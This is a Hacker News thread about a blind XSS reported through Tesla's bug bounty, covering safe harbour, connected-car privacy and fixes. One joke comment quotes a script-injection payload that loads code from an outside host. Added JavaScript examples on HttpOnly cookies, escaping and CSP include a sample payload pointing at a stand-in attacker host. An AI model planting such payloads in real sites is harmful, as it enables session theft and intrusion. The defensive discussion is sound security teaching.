
Cracking My Windshield and Earning $10k on the Tesla Bug Bounty Program - EdOverflow
https://samcurry.net/cracking-my-windshield-and-earning-10000-on-the-tesla-bug-bounty-program/
======
jxcl
This bug probably existed because some developer thought "this is an internal
application, I don't need to apply the same rigorous input/(edit: and output,
as replies point out) sanitation as I do with normal sites because it's only
accessible by VPN."

As a consultant that gets to see a lot of "internal only" applications, this
is one of the misconceptions that my coworkers and I try to fight against.
XSS is effective even if the attacker doesn't have access to the internal
application, because it's not the attacker's computer making the requests.

~~~
gwbas1c
Could just be because the application was written by a less experienced
programmer, or even outsourced?

~~~
disillusioned
Tesla and SpaceX are both pretty maniacal about not outsourcing programming,
to my knowledge.

~~~
rconti
Interesting. Obviously they view it as a core competency. This would seem like
a non-obvious and unnecessary expense to many, but (on the Tesla side)
differentiates them from other automakers. Whether that results in a barrier
to competition... we'll see.

~~~
spiralx
Although if you believe these anecdotes from a supposed ex-employee then
competency is not the word to use:

[https://twitter.com/atomicthumbs/status/1032939617404645376](https://twitter.com/atomicthumbs/status/1032939617404645376)

------
inlined
> On a final note, Tesla’s bug bounty program is fantastic. They provide a
> safe haven for researchers who are in good-faith trying to hack their cars.
> If you accidentally brick one, they’ll even offer support in attempting to
> fix it.

This is an amazingly open and refreshing policy!

~~~
hanniabu
Does this mean you can legally mod your car under the guise of hacking it?

~~~
whatshisface
It's not illegal to have a NO2 factory in your garage, it's illegal to drive
it on the roads. A good-faith emissions control hacking would probably not
involve long-distance highway driving or racing.

~~~
hanniabu
I was thinking you wouldn't have to tell Tesla this, but it's a good point
because the car is connected so they would know if you were driving it or not.

------
gibolt
What a great response and turnaround. Bug was fixed within 24 hours and paid
out within a month.

I wouldn't expect any other car manufacturer to respond ever, most don't even
own their software stack.

~~~
Someone1234
A lot of other vehicle manufacturers couldn't anyway, they don't build the
infotainment systems in-house, they simply just re-theme/re-badge the units
from companies like Panasonic, Pioneer, Fujitsu-Ten, etc.

So if they got a bug report it would have to travel through ten layers of
indirection before an engineer got to read it (let alone understand/respond).
Particularly when there might be two or three different written word languages
used between consumer and engineer (e.g. English -> Japanese -> Mandarin
(Taiwan)).

Tesla (and Ford previously) were actually oddballs in that they didn't use
"off the shelf" infotainment units.

~~~
gambiting
I've tried reporting a bug where on a 2016 Mercedes GLA if you're playing MP3s
from a USB stick the car will remember the track to play but nothing else
about it, so after coming back the same track plays but with the wrong name,
wrong album art, etc etc. It's literally impossible to. The dealer said they
have no way to do that except for just flashing my car with a newer FW and
hoping it fixes it (it didn't), messaging Mercedes UK yields no reply, posting
on their official forums yields no reply... I just gave up after a while.

------
simonebrunozzi
We should always, always applaud and praise companies that are at least this
serious about bounty programs.

Two years ago, although I wouldn't call myself the deepest technical person on
the planet, I found a terrible bug that exposed 1.1M records for a bay area
startup. (edit: the bug was really easy to find, it was a form of URL
injection. I couldn't even believe that bug was there in the first place).

I reached out to them multiple times, only to realize they were going to
ignore me in perpetuity. I didn't even want money, I would have been happy
just to see the bug fixed. (I never helped fix a bug that another company
had). Nada.

A less scrupulous person would have sold that information and exposed data for
1.1M people.

I am not naming the company here, even though they would totally deserve it.

~~~
deckar01
I once reverse engineered a Gmail worm found in the wild. The underlying
exploit ended up being a security scan bypass in Google docs. I spent a lot of
time submitting a bounty report, but I made one fatal mistake: I used URL
redirection in the PoC. It was automatically rejected even though that was an
example of content that the scan normally detects, not the actual
vulnerability. It was closed as not eligible, then silently fixed a week
later.

Edit: I checked the emails to refresh my memory. A human acknowledged that it
was a flaw in the security scanner and forwarded it to the drive team, then a
bot (AFAICT) determined that it was not eligible based on metadata in the
report.

Edit 2: I did get one thing out of it. They sent me an invitation to a Bounty
Craft event in Las Vegas during Def Con which I was attending that year
(likely the actions of another bot scraping the email list). I got there early
and accidentally sat down in the Microsoft Security Response team's couch area
while they were all up getting food. They were nice people. They realized I
never picked up swag on the way in and someone took me back to the door to get
it. Apparently since I was with one of the event organizers and they said "you
forgot to give him a t-shirt" they assumed I was staff and gave me a staff
t-shirt. The event was 100% about how the sponsor companies were investing in
automated fuzzing technologies and basically didn't need bug bounty hunters
anymore. Slap in the face.

~~~
behringer
Apparently google wants you to next time sell it to the highest bidder.

~~~
ajross
I understand the point you're making about incentives, but the phrasing is
poor. The reason people shouldn't sell exploits to the highest bidder isn't
because the vulnerable software author refuses to pay a bounty.

People shouldn't sell exploits because it's a crime that hurts people.

~~~
behringer
In the movie Independence Day the aliens' computer systems were hacked with a
few hours worth of work. Why were they hacked and destroyed? Because nobody
reported and worked on security incidents of course. Why would anyone need to
in a militaristic society?

My story is silly, of course, but the point is real. If you don't attack and
then fix systems, a lot of people will get hurt.

~~~
ajross
That's better phrased, indeed. The problem with your earlier statement is that
the incentives are not for the people you are talking about.

You don't offer rewards to prevent criminals from selling exploits. Criminals
are going to sell exploits anyway. Bug bounties have nothing to do with
criminal behavior.

Bounties are there to incentivize the honest people to do security work. And
the response of an honest person being denied a bounty _IS ABSOLUTELY NOT_ to
turn around and sell it.

------
brokenmachine
All the comments on here seem to be praising Tesla for paying a bug bounty,
but I'm just sitting here horrified at how much information a phone support
guy is able to view remotely about owners' cars, not to mention the ability to
send OTA updates.

No way am I buying a connected car.

~~~
reallydontask
I think you might be out of options soon, if you want a new car that is. A
while longer for used cars obviously.

Once all new cars are connected, the DuckDuckGo of cars will launch soon
thereafter with the promise of a privacy centric connected car :)

------
AdamN
The real thing you realize here is that Tesla is a software company (and it
will eat the world). Getting a hotfix out that fast is the proof in the
pudding.

------
Johnny555
Interestingly, the car returned the (current?) speed:

Speed: 81 mph

I wonder if that, coupled with the GPS info (which wasn't included in the data
returned, but I assume the car knows it) would be sufficient to issue a
speeding ticket if the government had access to the data?

~~~
samirm
But how would they know who to ticket? Just because your car is moving,
doesn't mean you're the one driving it. If they cannot prove who was operating
the vehicle at the time of infraction, they cannot issue a ticket.

~~~
tashoecraft
That's not true, red light cameras have no problem issuing fines to the
vehicle owner.

~~~
Faaak
Yes, but they take a picture of the car.

What if your car is being towed by a speeding truck (or on a trailer)?

~~~
Qwertystop
Then you could dispute the ticket, and presumably the fact that it's being
towed would be visible in the photo.

------
tlrobinson
I can imagine the support call:

> Did you really name your Tesla "><script src=//zlz.xss.ht></script>?

> Oh, yes, little Bobby ScriptSrc, we call him.

------
komali2
I mentioned this to my coworkers who brought up something I hadn't thought of
- would this be illegal in the USA via something such as CFAA?
[https://en.wikipedia.org/wiki/Computer_Fraud_and_Abuse_Act](https://en.wikipedia.org/wiki/Computer_Fraud_and_Abuse_Act)
He technically accessed Tesla's dashboard without authorization, for example.

~~~
EdOverflow
(Obligatory: I am not a lawyer)

This is what the "safe harbor" that the author was referring to is supposed to
cover.

> Tesla considers that a pre-approved, good-faith security researcher who
> complies with this policy to access a computer on a research-registered
> vehicle has not accessed a computer without authorization or exceeded
> authorized access under the Computer Fraud and Abuse Act ("CFAA"). [1]

*.teslamotors.com, which is where the blind XSS payload fired, is in scope and therefore the safe harbor covers that asset too. For more on bug bounty safe harbors, I would highly recommend taking a look at Amit Elazari's work at [https://amitelazari.com/%23legalbugbounty-hof](https://amitelazari.com/%23legalbugbounty-hof) and [https://github.com/edoverflow/legal-bug-bounty](https://github.com/edoverflow/legal-bug-bounty).

[1]: [https://bugcrowd.com/tesla](https://bugcrowd.com/tesla)

------
jcampbell1
The trend of storing auth tokens in localStorage rather than httpOnly cookies
is a problematic trend due to vulnerabilities like this. If you can exfiltrate
an auth token then one gets long lived access to the system.
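
An added example (not code from the write-up, from Tesla, or from the commenter) of the difference jcampbell1 describes. It models just enough browser behaviour to show it: script running in the page can read all of localStorage and every cookie except those marked HttpOnly. The cookie name `session`, the `authToken` key and the tokens are constructed for the demo.

```javascript
// Build a Set-Cookie header for a session token with the hardening attributes
// a browser honours. The cookie name "session" is a constructed example.
function sessionCookieHeader(token, { maxAgeSeconds = 3600 } = {}) {
  return [
    `session=${encodeURIComponent(token)}`,
    'HttpOnly',        // not exposed through document.cookie
    'Secure',          // only sent over TLS
    'SameSite=Strict', // not attached to cross-site requests
    'Path=/',
    `Max-Age=${maxAgeSeconds}`,
  ].join('; ');
}

// Parse a Set-Cookie header into { name, value, attrs }, attribute names lowercased.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const attrs = {};
  for (const attr of rest) {
    const i = attr.indexOf('=');
    if (i === -1) attrs[attr.toLowerCase()] = true;
    else attrs[attr.slice(0, i).toLowerCase()] = attr.slice(i + 1);
  }
  return {
    name: pair.slice(0, eq),
    value: decodeURIComponent(pair.slice(eq + 1)),
    attrs,
  };
}

// Simulate what an injected script could read: localStorage is fully readable,
// document.cookie omits HttpOnly cookies. Returns a map of leaked values.
function tokensReadableByScript(localStorageMap, setCookieHeaders) {
  const leaked = {};
  for (const [key, value] of Object.entries(localStorageMap)) {
    leaked[`localStorage:${key}`] = value;
  }
  for (const header of setCookieHeaders) {
    const cookie = parseSetCookie(header);
    if (!cookie.attrs.httponly) leaked[`cookie:${cookie.name}`] = cookie.value;
  }
  return leaked;
}

// Server-side self-check: a session cookie issued without these attributes is
// a misconfiguration worth failing a deployment test on.
function cookieIsHardened(header) {
  const { attrs } = parseSetCookie(header);
  return Boolean(attrs.httponly && attrs.secure && attrs.samesite);
}

// Constructed scenario: one token kept in localStorage, one in a hardened
// cookie, plus a harmless non-HttpOnly preference cookie.
const leakedDemo = tokensReadableByScript(
  { authToken: 'tok-A' },
  [sessionCookieHeader('tok-B'), 'theme=dark; Path=/'],
);
console.log(leakedDemo); // only tok-A and the theme cookie are readable
```

The point the simulation makes is that HttpOnly does not stop an XSS from issuing requests as the victim while the page is open, but it does stop the token itself from being copied out, so the access ends when the session does instead of lasting as long as the token.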

------
Zenst
That's impressive, a support process that is responsive, doesn't mess about
and is fair. Companies around the World could learn something from this. They
probably won't, but they certainly all could.

------
j0e1
Tangentially, how long did it take to get the windshield fixed? I've heard
horror stories about their service.

~~~
zlz123
I'm yet to fix it because the crack isn't too bad yet. Their windshield
replacement is through retailers who fit their standards and not Tesla
directly so I assume it won't be too bad as all they have to do is ship the
windscreen.

------
nickip
What would the fix for this be? Enabling CORS only for
https://garage.vn.teslamotors.com?

~~~
bzbarsky
CORS won't do it, because it protects the response target, not the response
source.

CSP would do the trick, though.

The other fix is properly escaping things before sticking them in your markup.
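
An added example (not code from the write-up, from Tesla, or from the commenters) of the two fixes bzbarsky names, applied to the scenario jxcl describes earlier in the thread: an attacker-controlled vehicle name rendered by an internal dashboard that the attacker never visits. The first layer is context-aware HTML escaping; the second is a Content-Security-Policy that refuses scripts from foreign origins even if an escaping bug slips through. The dashboard origin `https://garage.example`, the script host `attacker.example`, the `/csp-report` endpoint and the sample payload are all constructed for the demo.

```javascript
// Escape the five characters that let text break out of an element body or a
// double-quoted attribute. Enough for those two HTML contexts only; URLs,
// JavaScript strings and CSS need their own encoders.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// The vulnerable pattern: user data concatenated straight into markup.
function renderVehicleRowUnsafe(vehicle) {
  return `<tr><td data-name="${vehicle.name}">${vehicle.name}</td><td>${vehicle.vin}</td></tr>`;
}

// The fixed pattern: every interpolated value escaped for its HTML context.
function renderVehicleRow(vehicle) {
  const name = escapeHtml(vehicle.name);
  const vin = escapeHtml(vehicle.vin);
  return `<tr><td data-name="${name}">${name}</td><td>${vin}</td></tr>`;
}

// Demo-only check: did a <script> tag appear that the template itself never emits?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Defence in depth: a CSP that only allows scripts from the dashboard's own
// origin. No 'unsafe-inline' and no wildcard hosts, so an injected
// <script src="//attacker.example/..."> is refused by the browser.
function buildCsp() {
  return [
    "default-src 'self'",
    "script-src 'self'",
    "object-src 'none'",
    "base-uri 'self'",
    'report-uri /csp-report', // hypothetical violation-report endpoint
  ].join('; ');
}

// Minimal matcher for the script-src directive: supports 'self' and explicit
// origins, which is all this demo needs. Scheme-relative URLs such as
// //attacker.example resolve against the page origin, as a browser would.
function scriptAllowedByCsp(csp, pageOrigin, scriptUrl) {
  const directive = csp
    .split(';')
    .map((d) => d.trim().split(/\s+/))
    .find((parts) => parts[0] === 'script-src');
  if (!directive) return true; // no script-src: not modelled here
  const target = new URL(scriptUrl, pageOrigin).origin;
  const self = new URL(pageOrigin).origin;
  return directive.slice(1).some((src) => (src === "'self'" ? target === self : src === target));
}

// Constructed input: a vehicle whose name carries the classic attribute
// break-out payload. VIN is a placeholder.
const vehicle = { name: '"><script src=//attacker.example/x.js></script>', vin: 'VIN-PLACEHOLDER' };
console.log(renderVehicleRowUnsafe(vehicle)); // script tag survives
console.log(renderVehicleRow(vehicle));       // rendered as inert text
console.log(scriptAllowedByCsp(buildCsp(), 'https://garage.example', '//attacker.example/x.js')); // false
```

The escaping fix is the real one: it addresses the root cause regardless of where the data is later displayed, which matters for a blind XSS that fires in a system the submitter never sees. The CSP is a safety net for the next escaping bug, and its report-uri gives the defenders a detection signal when something does try to load from an unexpected origin.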

~~~
runeks
> The other fix is properly escaping things before sticking them in your
> markup.

Or simply not displaying user data using a markup language with built-in
remote code execution.

~~~
bzbarsky
Well, yes, there are various levels of "thinking outside the box" here that
could be applied.

------
samnwa
That was an awesome summary and a good example of the value of bug bounty
programs.

------
driverdan
This is a great example of why it's terrible to have a car that can be remote
controlled including the ability to push arbitrary updates. It should not be
possible to use XSS to compromise a vehicle.

~~~
trilila
Following this logic, nothing should be remotely controlled because there
might be security risks. Including OS updates to laptops.

~~~
driverdan
Correct. No one should be able to push out arbitrary code without explicit
user approval.

~~~
SquareWheel
Users have a terrible habit of not running updates. Years of botnets suggest
that automatic updates are probably the way to go.

------
benj111
I share my birthday with a car. I'm unsure how to feel about this, probably
better than sharing it with Rupert Murdoch, but worse than sharing it with
Douglas Adams.

------
redpilldealer
Nice to see Sam reached the front page of hacker news!

